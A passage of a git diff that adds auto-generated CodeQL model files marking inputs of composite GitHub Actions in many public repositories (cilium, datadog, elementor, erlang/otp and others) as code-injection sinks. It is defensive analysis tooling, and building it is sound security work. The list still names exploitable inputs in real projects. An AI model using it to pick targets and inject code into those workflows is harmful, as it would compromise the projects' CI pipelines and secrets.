b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/chia-blockchain", "*", "inputs.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml new file mode 100644 index 000000000000..dc48b2e8d20e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chipsalliance/chisel", "*", "inputs.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "inputs.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml new file mode 100644 index 000000000000..b46b5592ac55 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chocobozzz/peertube", "*", "inputs.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "inputs.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml new file mode 100644 index 000000000000..a38482ba6963 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cilium/cilium-cli", "*", "inputs.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.local-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml new file mode 100644 index 000000000000..ca1bf2f894ff --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cilium/cilium", "*", "inputs.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "inputs.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "inputs.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml new file mode 100644 index 000000000000..4a46ca788e57 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["citusdata/citus", "*", "inputs.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "inputs.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml new file mode 100644 index 000000000000..b1c5270165b7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["clerk/javascript", "*", "inputs.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml new file mode 100644 index 000000000000..9fcaa3fff768 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloud-custodian/cloud-custodian", "*", "inputs.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml new file mode 100644 index 000000000000..f21c3c1f9de2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/workers-sdk", "*", "inputs.package-manager", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml new file mode 100644 index 000000000000..7ff68860cf83 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudfoundry/cloud_controller/ng", "*", "inputs.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml new file mode 100644 index 000000000000..9e3d5bd41e32 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coder/coder", "*", "inputs.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml new file mode 100644 index 000000000000..63373bd78a79 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coil-kt/coil", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml new file mode 100644 index 000000000000..529614b8d79d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["commaai/openpilot", "*", "inputs.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "inputs.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml new file mode 100644 index 000000000000..ce3ce91d773a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["conan-io/conan-center-index", "*", "inputs.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "inputs.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml new file mode 100644 index 000000000000..ececaa835e94 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["corretto/corretto-8", "*", "inputs.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.local-branch", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml new file mode 100644 index 000000000000..0c19019e4f34 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cosmos/cosmos-sdk", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml new file mode 100644 index 000000000000..67a21fc2e86f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coturn/coturn", "*", "inputs.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml new file mode 100644 index 000000000000..3f0c5e645de4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crunchydata/postgres-operator", "*", "inputs.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml new file mode 100644 index 000000000000..470109b5e857 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cvc5/cvc5", "*", "inputs.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml new file mode 100644 index 000000000000..5ffefd58e53f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["d2l-ai/d2l-en", "*", "inputs.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml new file mode 100644 index 000000000000..742e1876811b --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml new file mode 100644 index 000000000000..97c75ae6f5c9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-dotnet", "*", "inputs.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml new file mode 100644 index 000000000000..fa98e84315df --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-go", "*", "inputs.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml new file mode 100644 index 000000000000..3bc48b644d00 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-js", "*", "inputs.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "inputs.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml new file mode 100644 index 000000000000..81e079430266 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datafuselabs/databend", "*", "inputs.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "inputs.dirs", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml new file mode 100644 index 000000000000..a1fdb476748e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["davatorium/rofi", "*", "inputs.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "inputs.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "inputs.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml new file mode 100644 index 000000000000..5744f3e74956 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["debezium/debezium", "*", "inputs.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml new file mode 100644 index 000000000000..852e39799d93 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["defenseunicorns/zarf", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml new file mode 100644 index 000000000000..a0d7eb51354e --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "inputs.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml new file mode 100644 index 000000000000..8d10d22cd5c0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["department-of-veterans-affairs/vets-website", "*", "inputs.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml new file mode 100644 index 000000000000..c99c630853e3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["devexpress/devextreme", "*", "inputs.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "inputs.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml new file mode 100644 index 000000000000..8554ebec65fa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["diggerhq/digger", "*", "inputs.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml new file mode 100644 index 000000000000..6f0878a77cbd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["diku-dk/futhark", "*", "inputs.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "inputs.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml new file mode 100644 index 000000000000..198109f790c1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["discourse/.github", "*", "inputs.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml new file mode 100644 index 000000000000..e634eaa38a2c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dnsjava/dnsjava", "*", "inputs.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "inputs.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml new file mode 100644 index 000000000000..e26ba9755d04 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotintent/react-native-ble-plx", "*", "inputs.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml new file mode 100644 index 000000000000..2cda1936f016 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotnet/docs-tools", "*", "inputs.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml new file mode 100644 index 000000000000..f83cf533944e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotnet/dotnet-monitor", "*", "inputs.files_to_commit", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml new file mode 100644 index 000000000000..5af04ac6ac70 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dragonflydb/dragonfly", "*", "inputs.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.build-folder-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml new file mode 100644 index 000000000000..0d0cae87e09d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eksctl-io/eksctl", "*", "inputs.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "inputs.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml new file mode 100644 index 000000000000..070b502e1889 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/apm-agent-dotnet", "*", "inputs.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml new file mode 100644 index 000000000000..6c0cf90523ac --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/apm-agent-java", "*", "inputs.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml new file mode 100644 index 000000000000..ca6459221d4b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elementor/elementor", "*", "inputs.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml new file mode 100644 index 000000000000..79d14b65bccc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["emberjs/data", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml new file mode 100644 index 000000000000..69771693787d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["emqx/emqx", "*", "inputs.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "inputs.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml new file mode 100644 index 000000000000..a5a3cfbb1c99 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eonasdan/tempus-dominus", "*", "inputs.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "inputs.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml new file mode 100644 index 000000000000..2000f5d9d00c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["erlang/otp", "*", "inputs.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "inputs.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git 